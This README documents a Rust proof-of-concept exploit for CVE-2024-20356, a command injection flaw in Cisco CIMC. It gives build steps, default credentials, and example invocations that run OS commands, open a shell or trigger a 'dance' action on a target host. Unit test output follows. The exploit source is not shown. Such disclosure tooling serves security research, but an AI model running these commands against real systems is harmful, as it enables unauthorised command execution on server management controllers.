# CVE-2024-20356
This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.

Written by Aaron and Oxidised by SherllyNeo

Full technical details can be found at [](

## Install
cargo build --release && cp ./target/release/CVE_2024_20356 ~/.local/bin/

## Usage
Usage: CVE_2024_20356 [OPTIONS] --host <HOSTNAME>

  -t, --host <HOSTNAME>      Target hostname or IP address (format or
  -u, --username <USERNAME>  Username [default: admin]
  -p, --password <PASSWORD>  Password [default: cisco]
  -a, --action <ACTION>      Action to perform [default: test] [possible values: test, cmd, shell, dance]
  -c, --cmd <CMD>            OS command to run [default: None]
  -v, --verbose              Displays more information about cimc
  -h, --help                 Print help
  -V, --version              Print version

Example commands:
CVE_2024_20356 --host 192.168.x.x -u admin -p your_password -v
CVE_2024_20356 --host 192.168.x.x -u admin -p your_password -c 'id'
CVE_2024_20356 --host 192.168.x.x -u admin -p your_password -a shell
CVE_2024_20356 --host 192.168.x.x -u admin -p your_password -a dance

Use the `--help` argument for full usage instructions.

## Disclaimer
This proof-of-concept is for demonstration purposes and should not be used for illegal activities. LRQA Nettitude are not responsible for any damage caused by the use or misuse of this code.
Don't be evil

## Tests
I wrote this without access to the server based on the [original code base](

Due to this I wrote extensive unit tests to ensure that the encryption functions match up with those found in the original.
That the login method works using a mock server.
That the arguement parsing works for IP addresses.

to run these tests, use cargo --test
cargo test 
   Compiling CVE_2024_20356 v0.1.0 
    Finished `test` profile [unoptimized + debuginfo] target(s) in 2.27s 
     Running unittests src/ (target/debug/deps/CVE_2024_20356-6d8ec478cd93405b) 
running 8 tests 
test libs::encryption::tests::pad_test ... ok 
test libs::encryption::tests::key_fnv32_test ... ok 
test libs::encryption::tests::aes_encrypt_test ... ok 
test libs::encryption::tests::derive_key_and_iv_test ... ok 
test libs::encryption::tests::hash_fnv32_test ... ok 
test libs::encryption::tests::encrypt_test ... ok 
test libs::actions::tests::login_test ... ok 
test libs::arguments::validate_hostname_test ... ok 
test result: ok. 8 passed; 0 failed; 0 ignored; 0 measured; 0 filtered out; finished in 0.02s 

## Project Structure 
I put this here as I avoided using and to show how main is a thin wrapper around lib.

This is to allow for integration tests in the future.

โ”œโ”€โ”€ libs 
โ”‚ย ย  โ”œโ”€โ”€ 
โ”‚ย ย  โ”œโ”€โ”€ 
โ”‚ย ย  โ””โ”€โ”€